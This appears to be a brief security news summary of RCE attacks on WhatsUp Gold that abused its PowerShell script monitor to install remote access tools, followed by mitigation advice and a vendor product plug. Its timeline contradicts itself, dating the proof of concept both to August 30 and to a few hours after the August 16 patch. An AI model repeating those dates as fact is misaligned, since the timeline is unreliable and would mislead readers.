Trend Micro researchers recently discovered remote code execution (RCE) attacks on WhatsUp Gold that exploited the Active Monitor PowerShell Script. These attacks targeted vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16. However, despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the publication of a proof of concept on August 30.
The attacks involved the abuse of NmPoller.exe to execute PowerShell scripts, download remote access tools, and attempt to gain persistence. To mitigate these attacks, organizations are advised to keep corporate services under access control, apply patches immediately, and closely monitor suspicious process creation events in WhatsUp Gold environments.
The vulnerability discovery and exploit attempts timeline revealed that the PoC was published on GitHub just a few hours after the patch release, leading to exploit attempts on the same day. This highlights the importance of applying patches promptly, even without a PoC available.
In addition to patch management, organizations should implement access control measures, multi-factor authentication (MFA), and strong password practices to enhance security. Monitoring for suspicious activities, such as external MSI package installations and RAT installations, is also crucial in detecting and preventing similar attacks.
Maintaining daily readiness and vigilance against cyberattacks is essential for effective emergency response. Organizations can also consider deploying security technologies like Trend Vision One™ for multilayered protection and behavior detection.
By following best practices and implementing robust security measures, organizations can strengthen their defenses against RCE attacks and other cybersecurity threats. Stay informed, stay vigilant, and prioritize cybersecurity to safeguard your digital assets and infrastructure.